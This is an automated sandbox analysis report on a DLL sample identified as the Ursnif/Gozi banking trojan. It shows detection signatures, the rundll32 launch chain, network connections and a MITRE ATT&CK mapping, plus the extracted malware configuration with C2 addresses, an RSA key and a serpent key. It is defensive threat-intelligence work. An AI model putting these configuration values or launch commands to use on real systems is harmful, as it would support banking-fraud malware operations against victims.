Windows Analysis Report
62835e34e60c1.dll

Overview

General Information

Sample Name:62835e34e60c1.dll
Analysis ID:628111
MD5:5572213d17be7de71f36fa68eb6808a8
SHA1:5e8b27d57f6c9dc02cf2e30d47f8ed439f0fa20e
SHA256:f58f9c8e6a62223efa263da10850e188004471cb2be65264b7f91f27ebab0766
Tags:DHL, dll, gozi, isfb, italy, ursnif
Infos:

Detection

Ursnif
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Ursnif
Writes registry values via WMI
Machine Learning detection for sample
Uses 32bit PE files
Sample file is different than original file name gathered from version info
One or more processes crash
PE file contains an invalid checksum
PE file contains strange resources
Found evasive API chain checking for process token information
Uses code obfuscation techniques (call, push, ret)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Checks if the current process is being debugged
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to dynamically determine API calls
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6164 cmdline: loaddll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6168 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5644 cmdline: rundll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WerFault.exe (PID: 6400 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 400 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6260 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 408 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6516 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 412 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
{"RSA Public Key": "uFHdIp1dwWhvkEA2yTiBbeuMW6YDB1lsKD5xr+wbKQpSTgCxKW/AXnU7L/HiYIBOAaOvelJb2/pY2jRw/FTeNeGEktAn4DWXMKOPXXT0NA64cjWTlmZ01c3ZQu3caOM/Vp3zMRoE3uvOCFkw5pB9m5AVXCHf7c66rMBTCpzNlB06TLav0Zslv7QoNXagpBRObC3w6aRV9zoEMPsKo8dDtjcXrpjT3cmo/nK2BeLeCRHw4m+Z1wNt/QFKG0JSvLN7KWGp2TqLTGCk8sWmJopJGBcCeH8dEEcUduFFgdi8Cilu/K4cd0diqylW1QdRW2VJSAgt/TyNLQ8XGjESLVVFp5dI5rtAU8yovXe+vZ9IsF8=", "c2_domain": ["config.edge.skype.com", "185.189.151.28", "185.189.151.70"], "botnet": "3000", "server": "50", "serpent_key": "noA8W2qeaw7z6wk9", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Source | Rule | Description | Author | Strings
00000003.00000003.484657934.0000000004E68000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000003.00000002.952141465.0000000004E68000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000003.00000003.484722678.0000000004E68000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000003.00000003.484767024.0000000004E68000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000003.00000003.484830136.0000000004E68000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
Source | Rule | Description | Author | Strings
3.2.rundll32.exe.400000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
3.2.rundll32.exe.48394a0.2.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
3.2.rundll32.exe.44b0000.1.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
3.2.rundll32.exe.48394a0.2.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
                    No Sigma rule has matched
                    Timestamp:05/17/22-10:46:47.467879
                    Source IP:192.168.2.5
                    Destination IP:13.107.43.16
                    SID:2033203
                    Source Port:49772
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    AV Detection

                    Source: 3.2.rundll32.exe.48394a0.2.raw.unpackMalware Configuration Extractor: Ursnif {"RSA Public Key": "uFHdIp1dwWhvkEA2yTiBbeuMW6YDB1lsKD5xr+wbKQpSTgCxKW/AXnU7L/HiYIBOAaOvelJb2/pY2jRw/FTeNeGEktAn4DWXMKOPXXT0NA64cjWTlmZ01c3ZQu3caOM/Vp3zMRoE3uvOCFkw5pB9m5AVXCHf7c66rMBTCpzNlB06TLav0Zslv7QoNXagpBRObC3w6aRV9zoEMPsKo8dDtjcXrpjT3cmo/nK2BeLeCRHw4m+Z1wNt/QFKG0JSvLN7KWGp2TqLTGCk8sWmJopJGBcCeH8dEEcUduFFgdi8Cilu/K4cd0diqylW1QdRW2VJSAgt/TyNLQ8XGjESLVVFp5dI5rtAU8yovXe+vZ9IsF8=", "c2_domain": ["config.edge.skype.com", "185.189.151.28", "185.189.151.70"], "botnet": "3000", "server": "50", "serpent_key": "noA8W2qeaw7z6wk9", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
                    Source: 62835e34e60c1.dllReversingLabs: Detection: 29%
                    Source: 62835e34e60c1.dllJoe Sandbox ML: detected
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044B5FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_044B5FBB
                    Source: 62835e34e60c1.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                    Source: Binary string: uwGXyM.pdb source: loaddll32.exe, 00000000.00000000.453061272.000000000040D000.00000002.00000001.01000000.00000003.sdmp, 62835e34e60c1.dll

                    Networking

                    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.189.151.28 80Jump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.189.151.70 80Jump to behavior
                    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49772 -> 13.107.43.16:80
                    Source: global trafficTCP traffic: 192.168.2.5:49784 -> 185.189.151.28:80
                    Source: global trafficTCP traffic: 192.168.2.5:49878 -> 185.189.151.70:80
                    Source: Joe Sandbox ViewASN Name: AS-SOFTPLUSCH AS-SOFTPLUSCH
                    Source: Joe Sandbox ViewIP Address: 185.189.151.28 185.189.151.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.70
                    Source: rundll32.exe, 00000003.00000002.952097072.0000000004A0B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.18
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044B1CA5 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,3_2_044B1CA5

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: Yara matchFile source: 00000003.00000003.484657934.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.952141465.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.484722678.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.484767024.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.484830136.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.484908156.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.484856150.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.484800968.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.484551463.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5644, type: MEMORYSTR
                    Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.48394a0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.44b0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.48394a0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.952020427.0000000004839000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                    E-Banking Fraud

                    Source: Yara matchFile source: 00000003.00000003.484657934.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.952141465.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.484722678.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.484767024.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.484830136.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.484908156.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.484856150.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.484800968.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.484551463.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5644, type: MEMORYSTR
                    Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.48394a0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.44b0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.48394a0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.952020427.0000000004839000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044B5FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_044B5FBB

                    System Summary

                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                    Source: 62835e34e60c1.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                    Source: 62835e34e60c1.dllBinary or memory string: OriginalFilenamemyfile.exe$ vs 62835e34e60c1.dll
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 400
                    Source: 62835e34e60c1.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_004022743_2_00402274
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044B16453_2_044B1645
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044B829C3_2_044B829C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044B4BF13_2_044B4BF1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00402067 NtMapViewOfSection,3_2_00402067
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00401000 NtCreateSection,memset,3_2_00401000
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00401308 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,3_2_00401308
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00402495 NtQueryVirtualMemory,3_2_00402495
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044B4321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_044B4321
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044B84C1 NtQueryVirtualMemory,3_2_044B84C1
                    Source: 62835e34e60c1.dllReversingLabs: Detection: 29%
                    Source: 62835e34e60c1.dllStatic PE information: Section: .text IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_MEM_FARDATA, IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_PROTECTED, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_LNK_OVER, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_LNK_COMDAT, IMAGE_SCN_GPREL, IMAGE_SCN_NO_DEFER_SPEC_EXC, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044B68BD CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,3_2_044B68BD
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll",#1
                    Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll"
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll",#1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll",#1
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 400
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 408
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 412
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll",#1Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll",#1Jump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6164
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERD1D5.tmpJump to behavior
                    Source: classification engineClassification label: mal96.troj.evad.winDLL@8/12@0/2
                    Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Binary string: uwGXyM.pdb source: loaddll32.exe, 00000000.00000000.453061272.000000000040D000.00000002.00000001.01000000.00000003.sdmp, 62835e34e60c1.dll
                    Source: 62835e34e60c1.dllStatic PE information: real checksum: 0x79835 should be: 0x6cbe1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00402263 push ecx; ret 3_2_00402273
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00402210 push ecx; ret 3_2_00402219
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044B828B push ecx; ret 3_2_044B829B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044B7EA0 push ecx; ret 3_2_044B7EA9
                    Source: 62835e34e60c1.dllStatic PE information: section name: .erloc
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_004015E3 LoadLibraryA,GetProcAddress,3_2_004015E3

                    Hooking and other Techniques for Hiding and Protection

                    Source: Yara matchFile source: 00000003.00000003.484657934.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.952141465.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.484722678.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.484767024.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.484830136.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.484908156.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.484856150.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.484800968.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.484551463.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5644, type: MEMORYSTR
                    Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.48394a0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.44b0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.48394a0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.952020427.0000000004839000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Windows\SysWOW64\WerFault.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                    Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_004015E3 LoadLibraryA,GetProcAddress,3_2_004015E3

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.189.151.28 80Jump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.189.151.70 80Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll",#1Jump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044B3365 cpuid 3_2_044B3365
                    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_004010C4 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,3_2_004010C4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00401C83 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,3_2_00401C83
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044B3365 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,3_2_044B3365

                    Stealing of Sensitive Information


                    Remote Access Functionality

                    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                    Valid Accounts1
                    Windows Management Instrumentation
                    Path Interception111
                    Process Injection
                    1
                    Virtualization/Sandbox Evasion
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    Exfiltration Over Other Network Medium2
                    Encrypted Channel
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                    Data Encrypted for Impact
                    Default Accounts2
                    Native API
                    Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts111
                    Process Injection
                    LSASS Memory1
                    Query Registry
                    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                    Ingress Tool Transfer
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                    Obfuscated Files or Information
                    Security Account Manager1
                    Security Software Discovery
                    SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                    Rundll32
                    NTDS1
                    Virtualization/Sandbox Evasion
                    Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
                    Process Discovery
                    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
                    Account Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                    System Owner/User Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                    Remote System Discovery
                    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow14
                    System Information Discovery
                    Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Behavior graph (ID: 628111; sample: 62835e34e60c1.dll; start date: 17/05/2022; architecture: WINDOWS; score: 96). Processes: loaddll32.exe started cmd.exe and three WerFault.exe instances; cmd.exe started rundll32.exe. Network: rundll32.exe connected to 185.189.151.28, port 80 and 185.189.151.70, port 80 (both AS-SOFTPLUSCH, Switzerland). Signatures on the sample: Snort IDS alert for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 2 other signatures. Signatures on rundll32.exe: System process connects to network (likely due to code injection or exploit); Writes registry values via WMI.

                    Source | Detection | Scanner | Label | Link
                    62835e34e60c1.dll | 29% | ReversingLabs | Win32.Trojan.Generic |
                    62835e34e60c1.dll | 100% | Joe Sandbox ML | |
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    3.2.rundll32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
                    3.2.rundll32.exe.44b0000.1.unpack | 100% | Avira | HEUR/AGEN.1245293 |
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    http://185.18 | 0% | Avira URL Cloud | safe |
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    l-0007.l-dc-msedge.net | 13.107.43.16 | true | true | | unknown
                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://185.18 | rundll32.exe, 00000003.00000002.952097072.0000000004A0B000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
                      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                      185.189.151.70 | unknown | Switzerland | | 51395 | AS-SOFTPLUSCH | true
                      185.189.151.28 | unknown | Switzerland | | 51395 | AS-SOFTPLUSCH | true
                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:628111
                      Start date and time: 2022-05-17 10:45:07 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 9m 27s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:62835e34e60c1.dll
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:27
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal96.troj.evad.winDLL@8/12@0/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 48.3% (good quality ratio 44.7%)
                      • Quality average: 78.7%
                      • Quality standard deviation: 30.7%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 46
                      • Number of non-executed functions: 31
                      Cookbook Comments:
                      • Found application associated with file extension: .dll
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32
                      • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                      • Excluded IPs from analysis (whitelisted): 20.189.173.21, 20.189.173.20, 13.107.43.16
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, arc.msn.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, onedsblobprdwus16.westus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, config.edge.skype.com
                      • Not all processes were analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: 62835e34e60c1.dll
                      Time | Type | Description
                      10:46:30 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
                      10:46:42 | API Interceptor | 1x Sleep call for process: rundll32.exe modified
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.7452936850874848
                                    Encrypted:false
                                    Malicious:false
                                    Reputation:low
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
